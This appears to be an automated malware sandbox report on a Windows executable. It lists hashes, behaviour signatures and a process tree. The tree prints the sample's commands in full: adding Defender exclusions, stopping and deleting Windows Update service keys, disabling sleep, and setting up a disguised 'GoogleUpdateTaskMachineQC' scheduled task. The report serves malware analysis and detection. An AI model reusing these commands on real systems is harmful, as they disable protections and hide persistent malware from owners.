Analysis
-
max time kernel
101s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2023 14:31
Static task
static1
Behavioral task
behavioral1
Sample
251658deca6970f2412e182eca1aff5b.bin.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
251658deca6970f2412e182eca1aff5b.bin.exe
Resource
win10v2004-20230220-en
General
-
Target
251658deca6970f2412e182eca1aff5b.bin.exe
-
Size
6.4MB
-
MD5
251658deca6970f2412e182eca1aff5b
-
SHA1
7be806a1ef3839e2a772f2c13c8bf6f13b77eb70
-
SHA256
f2cbacd915456e47e8801353dce4cfdbfe2aeeaf6d5a8adaeaa325d0c30d00fc
-
SHA512
adfe6a8072ee47b64880fb5b59d36372f9ef1112420bcadf8fea68e30289e94f5412a0c5f70ceff55c3fcb33e065a078b3532ed46619bc038e41ca1f8850b38d
-
SSDEEP
49152:hEwUKsFMIow42dH3zMJccuI/MEUjAkgxKoiogSogsfAC0h3Q18A3XwEdPTSqCuv0:1
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 3816 created 3160 3816 AppLaunch.exe 44 PID 3816 created 3160 3816 AppLaunch.exe 44 PID 3816 created 3160 3816 AppLaunch.exe 44 PID 3816 created 3160 3816 AppLaunch.exe 44 PID 3816 created 3160 3816 AppLaunch.exe 44 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts AppLaunch.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 4852 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3744 set thread context of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe AppLaunch.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4256 sc.exe 376 sc.exe 332 sc.exe 2416 sc.exe 1940 sc.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3744 251658deca6970f2412e182eca1aff5b.bin.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 1664 powershell.exe 1664 powershell.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 1396 powershell.exe 1396 powershell.exe 3816 AppLaunch.exe 3816 AppLaunch.exe 816 powershell.exe 816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3744 251658deca6970f2412e182eca1aff5b.bin.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeShutdownPrivilege 4600 powercfg.exe Token: SeCreatePagefilePrivilege 4600 powercfg.exe Token: SeShutdownPrivilege 4612 powercfg.exe Token: SeCreatePagefilePrivilege 4612 powercfg.exe Token: SeShutdownPrivilege 2508 powercfg.exe Token: SeCreatePagefilePrivilege 2508 powercfg.exe Token: SeShutdownPrivilege 4952 powercfg.exe Token: SeCreatePagefilePrivilege 4952 powercfg.exe Token: SeIncreaseQuotaPrivilege 1396 powershell.exe Token: SeSecurityPrivilege 1396 powershell.exe Token: SeTakeOwnershipPrivilege 1396 powershell.exe Token: SeLoadDriverPrivilege 1396 powershell.exe Token: SeSystemProfilePrivilege 1396 powershell.exe Token: SeSystemtimePrivilege 1396 powershell.exe Token: SeProfSingleProcessPrivilege 1396 powershell.exe Token: SeIncBasePriorityPrivilege 1396 powershell.exe Token: SeCreatePagefilePrivilege 1396 powershell.exe Token: SeBackupPrivilege 1396 powershell.exe Token: SeRestorePrivilege 1396 powershell.exe Token: SeShutdownPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeSystemEnvironmentPrivilege 1396 powershell.exe Token: SeRemoteShutdownPrivilege 1396 powershell.exe Token: SeUndockPrivilege 1396 powershell.exe Token: SeManageVolumePrivilege 1396 powershell.exe Token: 33 1396 powershell.exe Token: 34 1396 powershell.exe Token: 35 1396 powershell.exe Token: 36 1396 powershell.exe Token: SeIncreaseQuotaPrivilege 1396 powershell.exe Token: SeSecurityPrivilege 1396 powershell.exe Token: SeTakeOwnershipPrivilege 1396 powershell.exe Token: SeLoadDriverPrivilege 1396 powershell.exe Token: SeSystemProfilePrivilege 1396 powershell.exe Token: SeSystemtimePrivilege 1396 powershell.exe Token: SeProfSingleProcessPrivilege 1396 powershell.exe Token: SeIncBasePriorityPrivilege 1396 powershell.exe Token: SeCreatePagefilePrivilege 1396 powershell.exe Token: SeBackupPrivilege 1396 powershell.exe Token: SeRestorePrivilege 1396 powershell.exe Token: SeShutdownPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeSystemEnvironmentPrivilege 1396 powershell.exe Token: SeRemoteShutdownPrivilege 1396 powershell.exe Token: SeUndockPrivilege 1396 powershell.exe Token: SeManageVolumePrivilege 1396 powershell.exe Token: 33 1396 powershell.exe Token: 34 1396 powershell.exe Token: 35 1396 powershell.exe Token: 36 1396 powershell.exe Token: SeIncreaseQuotaPrivilege 1396 powershell.exe Token: SeSecurityPrivilege 1396 powershell.exe Token: SeTakeOwnershipPrivilege 1396 powershell.exe Token: SeLoadDriverPrivilege 1396 powershell.exe Token: SeSystemProfilePrivilege 1396 powershell.exe Token: SeSystemtimePrivilege 1396 powershell.exe Token: SeProfSingleProcessPrivilege 1396 powershell.exe Token: SeIncBasePriorityPrivilege 1396 powershell.exe Token: SeCreatePagefilePrivilege 1396 powershell.exe Token: SeBackupPrivilege 1396 powershell.exe Token: SeRestorePrivilege 1396 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 3744 wrote to memory of 3816 3744 251658deca6970f2412e182eca1aff5b.bin.exe 92 PID 1224 wrote to memory of 2416 1224 cmd.exe 101 PID 1224 wrote to memory of 2416 1224 cmd.exe 101 PID 1224 wrote to memory of 1940 1224 cmd.exe 102 PID 1224 wrote to memory of 1940 1224 cmd.exe 102 PID 3328 wrote to memory of 4600 3328 cmd.exe 103 PID 3328 wrote to memory of 4600 3328 cmd.exe 103 PID 1224 wrote to memory of 4256 1224 cmd.exe 104 PID 1224 wrote to memory of 4256 1224 cmd.exe 104 PID 1224 wrote to memory of 376 1224 cmd.exe 105 PID 1224 wrote to memory of 376 1224 cmd.exe 105 PID 3328 wrote to memory of 4612 3328 cmd.exe 106 PID 3328 wrote to memory of 4612 3328 cmd.exe 106 PID 1224 wrote to memory of 332 1224 cmd.exe 107 PID 1224 wrote to memory of 332 1224 cmd.exe 107 PID 3328 wrote to memory of 2508 3328 cmd.exe 108 PID 3328 wrote to memory of 2508 3328 cmd.exe 108 PID 3328 wrote to memory of 4952 3328 cmd.exe 109 PID 3328 wrote to memory of 4952 3328 cmd.exe 109 PID 1224 wrote to memory of 1836 1224 cmd.exe 110 PID 1224 wrote to memory of 1836 1224 cmd.exe 110 PID 1224 wrote to memory of 2144 1224 cmd.exe 111 PID 1224 wrote to memory of 2144 1224 cmd.exe 111 PID 1224 wrote to memory of 3744 1224 cmd.exe 112 PID 1224 wrote to memory of 3744 1224 cmd.exe 112 PID 1224 wrote to memory of 4376 1224 cmd.exe 113 PID 1224 wrote to memory of 4376 1224 cmd.exe 113 PID 1224 wrote to memory of 3240 1224 cmd.exe 114 PID 1224 wrote to memory of 3240 1224 cmd.exe 114 PID 816 wrote to memory of 3936 816 powershell.exe 117 PID 816 wrote to memory of 3936 816 powershell.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\251658deca6970f2412e182eca1aff5b.bin.exe"C:\Users\Admin\AppData\Local\Temp\251658deca6970f2412e182eca1aff5b.bin.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3816
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2416
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4256
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:332
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1836
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2144
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3744
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4376
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3240
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iccvflmn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ccdfe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3936
-
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Executes dropped EXE
PID:4852
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
121KB
MD5e9c3ec13a9c77b393692d748d8eb83ce
SHA1729e44ce32bc0709642eb79c46bd8c3e9f91232b
SHA2563682f6c9357e653150b1b7a96c30347e1abfa368a356db7c65a4c805f4eeb25e
SHA512f1bdcc7cded610b6821b8a322546864495dbd371ebed3fbe683bc3e3751ed57c6ecfdfe8fe701c77d9e1ee698406cb9d1c7b4e15b079f89a430895343ab51e79
-
Filesize
121KB
MD5e9c3ec13a9c77b393692d748d8eb83ce
SHA1729e44ce32bc0709642eb79c46bd8c3e9f91232b
SHA2563682f6c9357e653150b1b7a96c30347e1abfa368a356db7c65a4c805f4eeb25e
SHA512f1bdcc7cded610b6821b8a322546864495dbd371ebed3fbe683bc3e3751ed57c6ecfdfe8fe701c77d9e1ee698406cb9d1c7b4e15b079f89a430895343ab51e79
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
1KB
MD50d28e0c9fe4439db985e3a7e3c6055d7
SHA1484c5ab56151138115cb5cedc1f2a7e4543ecf30
SHA256c80a22a06ec7f853a86f59eed3626b842465e153ec80c893e3414a4aed26c3a4
SHA5125b4576a36aad30c0311d270f102ff91ac9253d042e96a81d19128bdea249f68fb571492bcd9323f072d193625a9b95824204d9e7342690f47f718aea14e8f562
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82